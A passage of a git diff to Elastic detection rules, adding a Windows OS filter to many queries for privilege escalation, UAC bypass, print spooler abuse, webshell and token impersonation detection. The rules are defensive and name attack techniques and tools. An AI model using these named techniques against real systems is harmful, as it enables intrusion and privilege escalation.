"CommandLineEventConsumer") diff --git a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml index 8041117b4..f1db5d3cb 100644 --- a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml +++ b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where +registry where host.os.type == "windows" and registry.data.strings != null and process.name : "WmiPrvSe.exe" and registry.path : ( "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", diff --git a/rules/windows/persistence_webshell_detection.toml b/rules/windows/persistence_webshell_detection.toml index 7016a2fa1..c22180f86 100644 --- a/rules/windows/persistence_webshell_detection.toml +++ b/rules/windows/persistence_webshell_detection.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -80,7 +80,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : ("w3wp.exe", "httpd.exe", "nginx.exe", "php.exe", "php-cgi.exe", "tomcat.exe") and process.name : ("cmd.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe", "wmic.exe", "wscript.exe") ''' diff --git a/rules/windows/privilege_escalation_create_process_as_different_user.toml b/rules/windows/privilege_escalation_create_process_as_different_user.toml index 3ba988511..e962008f8 100644 --- a/rules/windows/privilege_escalation_create_process_as_different_user.toml +++ b/rules/windows/privilege_escalation_create_process_as_different_user.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,14 +34,14 @@ type = "eql" query = ''' sequence by winlog.computer_name with maxspan=1m -[authentication where event.action:"logged-in" and +[authentication where host.os.type == "windows" and event.action:"logged-in" and event.outcome == "success" and user.id : ("S-1-5-21-*", "S-1-12-1-*") and /* seclogon service */ process.name == "svchost.exe" and winlog.event_data.LogonProcessName : "seclogo*" and source.ip == "::1" ] by winlog.event_data.TargetLogonId -[process where event.type == "start"] by winlog.event_data.TargetLogonId +[process where host.os.type == "windows" and event.type == "start"] by winlog.event_data.TargetLogonId ''' diff --git a/rules/windows/privilege_escalation_credroaming_ldap.toml b/rules/windows/privilege_escalation_credroaming_ldap.toml index 8c14dd73d..1523c3e10 100644 --- a/rules/windows/privilege_escalation_credroaming_ldap.toml +++ b/rules/windows/privilege_escalation_credroaming_ldap.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -55,9 +55,9 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.action:"Directory Service Changes" and event.code:"5136" and - winlog.event_data.AttributeLDAPDisplayName:"msPKIAccountCredentials" and winlog.event_data.OperationType:"%%14674" and - not winlog.event_data.SubjectUserSid : "S-1-5-18" +event.action:"Directory Service Changes" and host.os.type:windows and event.code:"5136" and + winlog.event_data.AttributeLDAPDisplayName:"msPKIAccountCredentials" and winlog.event_data.OperationType:"%%14674" and + not winlog.event_data.SubjectUserSid : "S-1-5-18" ''' diff --git a/rules/windows/privilege_escalation_disable_uac_registry.toml b/rules/windows/privilege_escalation_disable_uac_registry.toml index 1d6b08917..54088af74 100644 --- a/rules/windows/privilege_escalation_disable_uac_registry.toml +++ b/rules/windows/privilege_escalation_disable_uac_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -83,7 +83,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type == "change" and +registry where host.os.type == "windows" and event.type == "change" and registry.path : ( "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA", diff --git a/rules/windows/privilege_escalation_group_policy_iniscript.toml b/rules/windows/privilege_escalation_group_policy_iniscript.toml index 866b4b82c..dfd445c52 100644 --- a/rules/windows/privilege_escalation_group_policy_iniscript.toml +++ b/rules/windows/privilege_escalation_group_policy_iniscript.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -98,6 +98,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' +host.os.type:windows and ( event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:(gPCMachineExtensionNames or gPCUserExtensionNames) and winlog.event_data.AttributeValue:(*42B5FAAE-6536-11D2-AE5A-0000F87571E3* and diff --git a/rules/windows/privilege_escalation_group_policy_privileged_groups.toml b/rules/windows/privilege_escalation_group_policy_privileged_groups.toml index 43162f135..635a392ef 100644 --- a/rules/windows/privilege_escalation_group_policy_privileged_groups.toml +++ b/rules/windows/privilege_escalation_group_policy_privileged_groups.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -80,8 +80,9 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.code: "5136" and winlog.event_data.AttributeLDAPDisplayName:"gPCMachineExtensionNames" and -winlog.event_data.AttributeValue:(*827D319E-6EAC-11D2-A4EA-00C04F79F83A* and *803E14A0-B4FB-11D0-A0D0-00A0C90F574B*) +host.os.type:windows and event.code: "5136" and + winlog.event_data.AttributeLDAPDisplayName:"gPCMachineExtensionNames" and + winlog.event_data.AttributeValue:(*827D319E-6EAC-11D2-A4EA-00C04F79F83A* and *803E14A0-B4FB-11D0-A0D0-00A0C90F574B*) ''' diff --git a/rules/windows/privilege_escalation_group_policy_scheduled_task.toml b/rules/windows/privilege_escalation_group_policy_scheduled_task.toml index b7b2f2195..db1e4cc91 100644 --- a/rules/windows/privilege_escalation_group_policy_scheduled_task.toml +++ b/rules/windows/privilege_escalation_group_policy_scheduled_task.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -100,6 +100,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' +host.os.type:windows and (event.code: "5136" and winlog.event_data.AttributeLDAPDisplayName:("gPCMachineExtensionNames" or "gPCUserExtensionNames") and winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*)) or diff --git a/rules/windows/privilege_escalation_installertakeover.toml b/rules/windows/privilege_escalation_installertakeover.toml index e0e9a2d9e..bdd6f3cd6 100644 --- a/rules/windows/privilege_escalation_installertakeover.toml +++ b/rules/windows/privilege_escalation_installertakeover.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -87,7 +87,7 @@ type = "eql" query = ''' /* This rule is compatible with both Sysmon and Elastic Endpoint */ -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (?process.Ext.token.integrity_level_name : "System" or ?winlog.event_data.IntegrityLevel : "System") and ( diff --git a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml index a515d0ef5..b3d4af940 100644 --- a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml +++ b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ type = "eql" query = ''' sequence by winlog.computer_name with maxspan=5m - [authentication where + [authentication where host.os.type == "windows" and /* event 4624 need to be logged */ event.action == "logged-in" and event.outcome == "success" and @@ -41,7 +41,7 @@ sequence by winlog.computer_name with maxspan=5m winlog.event_data.AuthenticationPackageName :"Kerberos" and winlog.logon.type == "Network" and cidrmatch(source.ip, "127.0.0.0/8", "::1") and source.port > 0] by winlog.event_data.TargetLogonId - [any where + [any where host.os.type == "windows" and /* event 4697 need to be logged */ event.action : "service-installed"] by winlog.event_data.SubjectLogonId ''' diff --git a/rules/windows/privilege_escalation_lsa_auth_package.toml b/rules/windows/privilege_escalation_lsa_auth_package.toml index ed541ca10..69b384f4f 100644 --- a/rules/windows/privilege_escalation_lsa_auth_package.toml +++ b/rules/windows/privilege_escalation_lsa_auth_package.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type == "change" and +registry where host.os.type == "windows" and event.type == "change" and registry.path : "HKLM\\SYSTEM\\*ControlSet*\\Control\\Lsa\\Authentication Packages" and /* exclude SYSTEM SID - look for changes by non-SYSTEM user */ not user.id : "S-1-5-18" diff --git a/rules/windows/privilege_escalation_named_pipe_impersonation.toml b/rules/windows/privilege_escalation_named_pipe_impersonation.toml index 2ebf4536e..973eb6521 100644 --- a/rules/windows/privilege_escalation_named_pipe_impersonation.toml +++ b/rules/windows/privilege_escalation_named_pipe_impersonation.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/09" +updated_date = "2023/03/02" [rule] author = ["Elastic"] @@ -84,7 +84,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.pe.original_file_name in ("Cmd.Exe", "PowerShell.EXE") and process.args : "echo" and process.args : ">" and process.args : "\\\\.\\pipe\\*" ''' diff --git a/rules/windows/privilege_escalation_persistence_phantom_dll.toml b/rules/windows/privilege_escalation_persistence_phantom_dll.toml index 04199373b..b5f27e282 100644 --- a/rules/windows/privilege_escalation_persistence_phantom_dll.toml +++ b/rules/windows/privilege_escalation_persistence_phantom_dll.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/28" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -86,7 +86,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -any where +any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and ( /* compatible with Elastic Endpoint Library Events */ diff --git a/rules/windows/privilege_escalation_port_monitor_print_pocessor_abuse.toml b/rules/windows/privilege_escalation_port_monitor_print_pocessor_abuse.toml index ce499c829..8137eebf9 100644 --- a/rules/windows/privilege_escalation_port_monitor_print_pocessor_abuse.toml +++ b/rules/windows/privilege_escalation_port_monitor_print_pocessor_abuse.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type in ("creation", "change") and +registry where host.os.type == "windows" and event.type in ("creation", "change") and registry.path : ("HKLM\\SYSTEM\\*ControlSet*\\Control\\Print\\Monitors\\*", "HKLM\\SYSTEM\\*ControlSet*\\Control\\Print\\Environments\\Windows*\\Print Processors\\*") and registry.data.strings : "*.dll" and diff --git a/rules/windows/privilege_escalation_posh_token_impersonation.toml b/rules/windows/privilege_escalation_posh_token_impersonation.toml index 4051d0448..8bb7130fd 100644 --- a/rules/windows/privilege_escalation_posh_token_impersonation.toml +++ b/rules/windows/privilege_escalation_posh_token_impersonation.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/05" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -51,7 +51,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and +event.category:process and host.os.type:windows and powershell.file.script_block_text:( "Invoke-TokenManipulation" or "ImpersonateNamedPipeClient" or diff --git a/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml b/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml index 0e443e572..f03a4121b 100644 --- a/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml +++ b/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,10 +31,10 @@ type = "eql" query = ''' sequence by host.id with maxspan=30s -[registry where +[registry where host.os.type == "windows" and registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers\\*\\SpoolDirectory" and registry.data.strings : "C:\\Windows\\System32\\spool\\drivers\\x64\\4"] -[registry where +[registry where host.os.type == "windows" and registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers\\*\\CopyFiles\\Payload\\Module" and registry.data.strings : "C:\\Windows\\System32\\spool\\drivers\\x64\\4\\*"] ''' diff --git a/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml b/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml index f5c4d7f3d..d66594b46 100644 --- a/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml +++ b/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/21" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "creation" and +file where host.os.type == "windows" and event.type == "creation" and process.name : "spoolsv.exe" and file.extension : "dll" and file.path : ("?:\\Windows\\System32\\*", "?:\\Windows\\SysWOW64\\*") and not file.path : diff --git a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml index 001227bbd..15fd3b169 100644 --- a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml +++ b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -36,7 +36,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type : "deletion" and +file where host.os.type == "windows" and event.type : "deletion" and not process.name : ("spoolsv.exe", "dllhost.exe", "explorer.exe") and file.path : "?:\\Windows\\System32\\spool\\drivers\\x64\\3\\*.dll" ''' diff --git a/rules/windows/privilege_escalation_printspooler_suspicious_spl_file.toml b/rules/windows/privilege_escalation_printspooler_suspicious_spl_file.toml index 7b6e10a38..e76aa7159 100644 --- a/rules/windows/privilege_escalation_printspooler_suspicious_spl_file.toml +++ b/rules/windows/privilege_escalation_printspooler_suspicious_spl_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -83,7 +83,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "windows" and event.type != "deletion" and file.extension : "spl" and file.path : "?:\\Windows\\System32\\spool\\PRINTERS\\*" and not process.name : ("spoolsv.exe", diff --git a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml index d5651b6ca..a5b994c73 100644 --- a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml +++ b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where registry.path : ("HKEY_USERS\\*\\Environment\\windir", "HKEY_USERS\\*\\Environment\\systemroot") and +registry where host.os.type == "windows" and registry.path : ("HKEY_USERS\\*\\Environment\\windir", "HKEY_USERS\\*\\Environment\\systemroot") and not registry.data.strings : ("C:\\windows", "%SystemRoot%") ''' diff --git a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml index fdf9d8142..65690acbc 100644 --- a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml +++ b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -37,7 +37,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -iam where event.action == "renamed-user-account" and +iam where host.os.type == "windows" and event.action == "renamed-user-account" and /* machine account name renamed to user like account name */ winlog.event_data.OldTargetUserName : "*$" and not winlog.event_data.NewTargetUserName : "*$" ''' diff --git a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml index 34b89a371..36e27b181 100644 --- a/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml +++ b/rules/windows/privilege_escalation_suspicious_dnshostname_update.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,17 +32,17 @@ type = "eql" query = ''' sequence by winlog.computer_name with maxspan=5m - [authentication where event.action == "logged-in" and + [authentication where host.os.type == "windows" and event.action == "logged-in" and winlog.logon.type == "Network" and event.outcome == "success" and not user.name == "ANONYMOUS LOGON" and not winlog.event_data.SubjectUserName : "*$" and not user.domain == "NT AUTHORITY" and source.ip != "127.0.0.1" and source.ip !="::1"] by winlog.event_data.TargetLogonId - [iam where event.action == "changed-computer-account" and + [iam where host.os.type == "windows" and event.action == "changed-computer-account" and /* if DnsHostName value equal a DC DNS hostname then it's highly suspicious */ winlog.event_data.DnsHostName : "??*" and - /* exclude FPs where DnsHostName starts with the ComputerName that was changed */ + /* exclude FPs where host.os.type == "windows" and DnsHostName starts with the ComputerName that was changed */ not startswith~(winlog.event_data.DnsHostName, substring(winlog.event_data.TargetUserName, 0, length(winlog.event_data.TargetUserName) - 1)) ] by winlog.event_data.SubjectLogonId ''' diff --git a/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml b/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml index a5cbd5270..8b521152f 100644 --- a/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml +++ b/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -46,7 +46,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -any where event.provider: "Microsoft-Windows-Security-Auditing" and +any where host.os.type == "windows" and event.provider: "Microsoft-Windows-Security-Auditing" and event.action : "Token Right Adjusted Events" and winlog.event_data.EnabledPrivilegeList : "SeDebugPrivilege" and diff --git a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml index 1ff06c2de..bdecc8e3c 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and process.name : "Clipup.exe" and +process where host.os.type == "windows" and event.type == "start" and process.name : "Clipup.exe" and not process.executable : "C:\\Windows\\System32\\ClipUp.exe" and process.parent.name : "dllhost.exe" and /* CLSID of the Elevated COM Interface IEditionUpgradeManager */ process.parent.args : "/Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" diff --git a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml index df6d6e0de..d76cfcf23 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.executable : "C:\\*\\AppData\\*\\Temp\\IDC*.tmp\\*.exe" and process.parent.name : "ieinstal.exe" and process.parent.args : "-Embedding" diff --git a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml index aa5cd6dd2..849c0864e 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name == "dllhost.exe" and process.parent.args in ("/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and process.pe.original_file_name != "WerFault.exe" diff --git a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml index 30ed1f1ff..944b0e27f 100644 --- a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml +++ b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.args : "/autoclean" and process.args : "/d" and not process.executable : ("C:\\Windows\\System32\\cleanmgr.exe", "C:\\Windows\\SysWOW64\\cleanmgr.exe", diff --git a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml index 0b52e6f2c..79469b10a 100644 --- a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml +++ b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type : "change" and process.name : "dllhost.exe" and +file where host.os.type == "windows" and event.type : "change" and process.name : "dllhost.exe" and /* Known modules names side loaded into process running with high or system integrity level for UAC Bypass, update here for new modules */ file.name : ("wow64log.dll", "comctl32.dll", "DismCore.dll", "OskSupport.dll", "duser.dll", "Accessibility.ni.dll") and /* has no impact on rule logic just to avoid OS install related FPs */ diff --git a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml index 7c92facf5..9e13964cc 100644 --- a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml +++ b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/17" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -83,7 +83,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "eventvwr.exe" and not process.executable : ("?:\\Windows\\SysWOW64\\mmc.exe", diff --git a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml index 80b0a458b..91b770b59 100644 --- a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml +++ b/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/26" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -83,7 +83,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.args : ("C:\\Windows \\system32\\*.exe", "C:\\Windows \\SysWOW64\\*.exe") ''' diff --git a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml index e7a75b731..c919518e3 100644 --- a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml +++ b/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/14" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -83,7 +83,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name == "mmc.exe" and /* process.Ext.token.integrity_level_name == "high" can be added in future for tuning */ /* args of the Windows Firewall SnapIn */ diff --git a/rules/windows/privilege_escalation_uac_sdclt.toml b/rules/windows/privilege_escalation_uac_sdclt.toml index a1e430b7e..3c32d79b0 100644 --- a/rules/windows/privilege_escalation_uac_sdclt.toml +++ b/rules/windows/privilege_escalation_uac_sdclt.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "development" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,12 +26,12 @@ query = ''' /* still needs testing, applicable binary was not available on test machine */ sequence with maxspan=1m - [process where event.type == "start" and process.name : "sdclt.exe" and + [process where host.os.type == "windows" and event.type == "start" and process.name : "sdclt.exe" and /* uncomment once in winlogbeat */ /* process.code_signature.subject_name == "Microsoft Corporation" and process.code_signature.trusted == true and */ process.args : "/kickoffelev" ] by process.entity_id - [process where event.type == "start" and process.parent.name : "sdclt.exe" and + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "sdclt.exe" and not (process.executable : "C:\\Windows\\System32\\sdclt.exe" or process.executable : "C:\\Windows\\System32\\control.exe" or process.executable : "C:\\Windows\\SysWOW64\\sdclt.exe" or diff --git a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml b/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml index 5acc65266..04d0ab341 100644 --- a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml +++ 